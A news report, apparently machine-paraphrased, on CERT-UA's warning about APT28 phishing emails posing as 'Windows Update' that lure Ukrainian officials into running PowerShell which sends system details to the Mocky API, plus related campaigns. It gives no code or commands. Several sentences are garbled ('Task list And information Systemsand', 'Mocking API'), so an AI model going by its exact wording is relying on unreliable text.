APT28 Targets Ukrainian Government Entities with Spoofed “Windows Update” Emails.
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a cyber attack by Russian nation-state hackers targeting various government agencies in the country.
Agent associated phishing campaign to APT28, also known as Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.
The email message came with the subject line “Windows Update” and purportedly contained instructions in Ukrainian to run PowerShell commands under the pretense of a security update.
Executing the script loads and executes a next stage of PowerShell script designed to gather basic system information via commands such as Task list And information Systemsand extract the details via HTTP request to a Mocking API.
To trick the target into executing the command, the email impersonates the system administrator of the targeted government entity using a fake Microsoft Outlook email account created with an employee’s real name and initials.
CERT-UA recommends that organizations limit users’ ability to run PowerShell scripts and monitor network connections to the Mocky API.
The disclosure comes weeks after APT28 was linked to an attack that exploited a now-patched security flaw in network equipment to perform reconnaissance and spread malware against specific targets.
The Google Threat Analysis Group (TAG), in an advisory published last month, details a credential harvesting operation carried out by threat actors to redirect visitors to Ukrainian government websites to phishing domains.
Russia-based hacking crews have also been linked to exploiting a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) in intrusions directed against the government, transport, energy, and military sectors in Europe.
Learn How to Stop Ransomware with Real-Time Protection
Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.
Development also exists as Fortinet FortiGuard Labs uncovered a multi-stage phishing attack that leveraged an alleged macro-linked Word document from Energoatom Ukraine as a lure to deliver the open source Havoc post-exploit framework.
“It is highly likely that the Russian intelligence, military and law enforcement services have a long-standing tacit understanding with the perpetrators of cybercrime threats,” cybersecurity firm Recorded Future said in a report earlier this year.
“In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercrime threat actors, either through indirect collaboration or through recruitment.”
